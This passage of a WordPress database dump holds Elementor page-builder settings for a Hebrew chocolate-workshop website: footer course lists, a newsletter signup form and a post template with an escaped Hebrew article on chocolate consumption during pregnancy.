\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(762,161,'_elementor_version','0.4'),(763,161,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(766,162,'_elementor_template_type','single'),(767,162,'_elementor_edit_mode','builder'),(768,162,'_wp_page_template','default'),(769,162,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(770,162,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7c736ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"081917e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8afb22\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e0d5494\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e2\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05e8\\u05d9\\u05d5\\u05df\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f9a6523\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/pregnent-choclate.jpg\",\"id\":154},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eef1985\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-size: 1rem;\\\">\\u05ea\\u05d5\\u05e6\\u05d0\\u05d5\\u05ea \\u05de\\u05d7\\u05e7\\u05e8 \\u05d7\\u05d3\\u05e9 \\u05e6\\u05e4\\u05d5\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05e7\\u05d1\\u05dc \\u05d1\\u05d1\\u05e8\\u05db\\u05d4 \\u05d7\\u05de\\u05d4 \\u05e2\\u05dc \\u05d9\\u05d3\\u05d9 \\u05d0\\u05de\\u05d4\\u05d5\\u05ea \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3, \\u05d1\\u05d4\\u05ea\\u05d7\\u05e9\\u05d1 \\u05d1\\u05e8\\u05e9\\u05d9\\u05de\\u05d4 \\u05d4\\u05d0\\u05e8\\u05d5\\u05db\\u05d4 \\u05e9\\u05dc \\u05d4\\u05de\\u05d6\\u05d5\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05dd \\u05d4\\u05df \\u05de\\u05ea\\u05d1\\u05e7\\u05e9\\u05d5\\u05ea \\u05dc\\u05d4\\u05d9\\u05de\\u05e0\\u05e2 \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05d4\\u05d9\\u05e8\\u05d9\\u05d5\\u05df. \\u05d1\\u05e2\\u05d5\\u05d3 \\u05e9\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05de\\u05e8\\u05d1\\u05d4 \\u05d4\\u05de\\u05d6\\u05dc, \\u05e0\\u05e2\\u05d3\\u05e8 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d4 \\u05d6\\u05d5, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05e0\\u05e9\\u05d9\\u05dd \\u05d4\\u05e8\\u05d5\\u05ea \\u05dc\\u05d4\\u05d9\\u05de\\u05e0\\u05e2 \\u05de\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05db\\u05d2\\u05d5\\u05df \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d9\\u05dd \\u05e9\\u05d5\\u05de\\u05df, \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e7\\u05e4\\u05d0\\u05d9\\u05df.<\\/span><\\/p><p>\\u05d0\\u05da \\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d9\\u05ea\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05e0\\u05dc\\u05d5\\u05d5\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d9\\u05db\\u05d4 \\u05de\\u05ea\\u05d5\\u05e0\\u05d4 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d5\\u05d0 \\u05de\\u05db\\u05d9\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d8\\u05e2\\u05dd \\u05de\\u05e1\\u05d5\\u05d2 \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd, \\u05d4\\u05e0\\u05e7\\u05e9\\u05e8\\u05d9\\u05dd \\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05de\\u05d5\\u05e4\\u05d7\\u05ea \\u05dc\\u05d1\\u05e2\\u05d9\\u05d5\\u05ea \\u05dc\\u05d1 \\u05d5\\u05db\\u05dc\\u05d9 \\u05d3\\u05dd \\u05d5\\u05db\\u05d5\\u05dc\\u05e1\\u05d8\\u05e8\\u05d5\\u05dc \\u05e0\\u05de\\u05d5\\u05da. \\u05db\\u05db\\u05dc \\u05e9\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05d4\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05db\\u05da \\u05d4\\u05d5\\u05d0 \\u05de\\u05db\\u05d9\\u05dc \\u05d9\\u05d5\\u05ea\\u05e8 \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd.<\\/p><p>\\u05d2\\u05dd \\u05de\\u05d7\\u05e7\\u05e8\\u05d9\\u05dd \\u05e7\\u05d5\\u05d3\\u05de\\u05d9\\u05dd \\u05d4\\u05e8\\u05d0\\u05d5 \\u05e9\\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05ea\\u05d5\\u05e0\\u05d4 \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05d4\\u05d9\\u05e8\\u05d9\\u05d5\\u05df \\u05e2\\u05e9\\u05d5\\u05d9\\u05d4 \\u05dc\\u05d4\\u05d5\\u05e8\\u05d9\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05de\\u05e6\\u05d1 \\u05d1\\u05d5 \\u05d0\\u05e1\\u05e4\\u05e7\\u05ea \\u05d4\\u05d3\\u05dd \\u05dc\\u05e2\\u05d5\\u05d1\\u05e8 \\u05de\\u05e6\\u05d8\\u05de\\u05e6\\u05de\\u05ea \\u05d1\\u05d2\\u05dc\\u05dc \\u05dc\\u05d7\\u05e5 \\u05d4\\u05d3\\u05dd \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05e8\\u05d9\\u05d5\\u05df: \\u05d4\\u05de\\u05d7\\u05e7\\u05e8<\\/strong><\\/h2><p>\\u05d4\\u05d7\\u05d5\\u05e7\\u05e8\\u05d9\\u05dd \\u05e2\\u05e7\\u05d1\\u05d5 \\u05d0\\u05d7\\u05e8 129 \\u05e0\\u05e9\\u05d9\\u05dd \\u05d4\\u05e8\\u05d5\\u05ea \\u05e2\\u05dd \\u05d4\\u05e8\\u05d9\\u05d5\\u05df \\u05d9\\u05d7\\u05d9\\u05d3, \\u05e9\\u05e0\\u05de\\u05e6\\u05d0\\u05d5 \\u05d1\\u05d9\\u05df \\u05d4\\u05e9\\u05d1\\u05d5\\u05e2\\u05d5\\u05ea \\u05d4-11-14 \\u05dc\\u05d4\\u05e8\\u05d9\\u05d5\\u05e0\\u05df. \\u05db\\u05dc \\u05d4\\u05e0\\u05e9\\u05d9\\u05dd \\u05e2\\u05d1\\u05e8\\u05d5 \\u05d1\\u05d3\\u05d9\\u05e7\\u05d5\\u05ea \\u05d3\\u05d5\\u05e4\\u05e7 \\u05d1\\u05ea\\u05d7\\u05d9\\u05dc\\u05ea \\u05d4\\u05de\\u05d7\\u05e7\\u05e8, \\u05db\\u05de\\u05d5 \\u05d2\\u05dd \\u05d1\\u05d3\\u05d9\\u05e7\\u05d5\\u05ea \\u05d6\\u05e8\\u05d9\\u05de\\u05ea \\u05d4\\u05d3\\u05dd \\u05d4\\u05e8\\u05d7\\u05de\\u05d9\\u05ea, \\u05d4\\u05e9\\u05dc\\u05d9\\u05d4 \\u05d5\\u05d4\\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05ea. \\u05d4\\u05e0\\u05ea\\u05d5\\u05e0\\u05d9\\u05dd \\u05e9\\u05d9\\u05de\\u05e9\\u05d5 \\u05db\\u05e1\\u05de\\u05df \\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05d9\\u05ea\\u05e8 \\u05dc\\u05d7\\u05e5 \\u05d3\\u05dd \\u05d5\\u05ea\\u05d5\\u05e6\\u05d0\\u05d5\\u05ea \\u05e9\\u05dc\\u05d9\\u05dc\\u05d9\\u05d5\\u05ea \\u05d0\\u05e4\\u05e9\\u05e8\\u05d9\\u05d5\\u05ea \\u05d0\\u05d7\\u05e8\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d4\\u05d9\\u05e8\\u05d9\\u05d5\\u05df.<\\/p><p>\\u05d4\\u05d0\\u05de\\u05d4\\u05d5\\u05ea \\u05d4\\u05d4\\u05e8\\u05d5\\u05ea \\u05d7\\u05d5\\u05dc\\u05e7\\u05d5 \\u05d1\\u05d0\\u05e7\\u05e8\\u05d0\\u05d9 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05e9\\u05e7\\u05d9\\u05d1\\u05dc\\u05d5 \\u05e9\\u05dc\\u05d5\\u05e9\\u05d9\\u05dd \\u05d2\\u05e8\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d3\\u05dc\\u05d9\\u05dc \\u05d1\\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd \\u05de\\u05d3\\u05d9 \\u05d9\\u05d5\\u05dd, \\u05d1\\u05de\\u05e9\\u05da \\u05e9\\u05dc\\u05d5\\u05e9\\u05d4 \\u05d7\\u05d5\\u05d3\\u05e9\\u05d9\\u05dd. \\u05d4\\u05dd \\u05e2\\u05d1\\u05e8\\u05d5 \\u05d1\\u05d3\\u05d9\\u05e7\\u05d5\\u05ea \\u05e2\\u05d5\\u05e8\\u05e7\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d5\\u05ea \\u05d1\\u05ea\\u05d5\\u05dd \\u05e9\\u05dc\\u05d5\\u05e9\\u05ea \\u05d4\\u05d7\\u05d5\\u05d3\\u05e9\\u05d9\\u05dd, \\u05d5\\u05e0\\u05de\\u05e6\\u05d0\\u05d5 \\u05d1\\u05de\\u05e2\\u05e7\\u05d1 \\u05e2\\u05d3 \\u05d4\\u05dc\\u05d9\\u05d3\\u05d4.<\\/p><h2><strong>\\u05d4\\u05de\\u05de\\u05e6\\u05d0\\u05d9\\u05dd: \\u05db\\u05dc \\u05ea\\u05db\\u05d5\\u05dc\\u05d4 \\u05e9\\u05dc \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e2\\u05d5\\u05d1\\u05e8<\\/strong><\\/h2><p>\\u05d4\\u05d7\\u05d5\\u05e7\\u05e8\\u05d9\\u05dd \\u05d2\\u05d9\\u05dc\\u05d5 \\u05db\\u05d9 \\u05dc\\u05d0 \\u05e0\\u05de\\u05e6\\u05d0\\u05d5 \\u05d4\\u05d1\\u05d3\\u05dc\\u05d9\\u05dd \\u05de\\u05d1\\u05d7\\u05d9\\u05e0\\u05ea \\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05dc\\u05d7\\u05e5 \\u05d9\\u05ea\\u05e8 \\u05e9\\u05dc \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05de\\u05e9\\u05e7\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d4 \\u05d5\\u05de\\u05e9\\u05e7\\u05dc \\u05d4\\u05dc\\u05d9\\u05d3\\u05d4 \\u05d1\\u05d9\\u05df \\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d4\\u05e0\\u05e9\\u05d9\\u05dd \\u05e9\\u05e7\\u05d9\\u05d1\\u05dc\\u05d5 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05dc\\u05d5 \\u05e8\\u05de\\u05d5\\u05ea \\u05e0\\u05de\\u05d5\\u05db\\u05ea \\u05e9\\u05dc \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd, \\u05dc\\u05d1\\u05d9\\u05df \\u05d4\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05e9\\u05e7\\u05d9\\u05d1\\u05dc\\u05d5 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd. \\u05e6\\u05d5\\u05d5\\u05ea \\u05d4\\u05de\\u05d3\\u05e2\\u05e0\\u05d9\\u05dd \\u05de\\u05e6\\u05d9\\u05d9\\u05df \\u05e9\\u05ea\\u05d5\\u05e6\\u05d0\\u05d5\\u05ea \\u05d0\\u05dc\\u05d5 \\u05d4\\u05d9\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea \\u05de\\u05d4\\u05e6\\u05e4\\u05d5\\u05d9 \\u05d1\\u05e8\\u05d5\\u05d1 \\u05d4\\u05de\\u05e7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05e8\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc\\u05d5\\u05e1\\u05d9\\u05d9\\u05d4 \\u05d4\\u05db\\u05dc\\u05dc\\u05d9\\u05ea.<\\/p><p>\\u05dc\\u05d3\\u05d1\\u05e8\\u05d9\\u05d4\\u05dd, \\u05de\\u05d7\\u05e7\\u05e8 \\u05d6\\u05d4 \\u05de\\u05e6\\u05d1\\u05d9\\u05e2 